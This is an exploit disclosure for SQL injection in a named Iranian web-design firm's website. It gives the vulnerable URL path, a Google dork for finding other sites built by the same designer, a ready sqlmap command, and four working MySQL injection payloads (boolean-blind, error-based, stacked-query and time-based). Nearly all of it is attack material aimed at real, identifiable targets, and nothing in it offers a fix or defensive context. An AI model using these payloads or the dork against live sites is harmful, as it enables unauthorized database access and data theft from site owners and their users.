# Exploit Title: SQL Injection Vulnerability Irandesign.ir
# Author: K0uR0sH3R
# Date: 18/04/2021
# Tested On: Kali Linux
# Contact: https://t.me/BugExpose
# Google Dork: intext:"طراحی سایت توسط ایران دیزاین"
----------------------------------------------------------------------------------------------------
# Vulnerable Path: http://irandesign.ir/project/show/id/15
# python3 sqlmap.py -u "http://irandesign.ir/project/show/id/15" --random-agent --dbms=mysql --no-cast --batch
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: http://irandesign.ir:80/project/show/id/15) RLIKE (SELECT (CASE WHEN (8944=8944) THEN 15 ELSE 0x28 END))-- WIUR
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: http://irandesign.ir:80/project/show/id/15) AND GTID_SUBSET(CONCAT(0x7171716a71,(SELECT (ELT(9203=9203,1))),0x7170707871),9203)-- cGuG
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: http://irandesign.ir:80/project/show/id/15);SELECT SLEEP(5)#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://irandesign.ir:80/project/show/id/15) AND (SELECT 6165 FROM (SELECT(SLEEP(5)))IcGz)-- Xbei
---
# Contact: https://t.me/BugExpose , T.me/K0uR0sH3R_info , K0uR0sH3R@gmail.com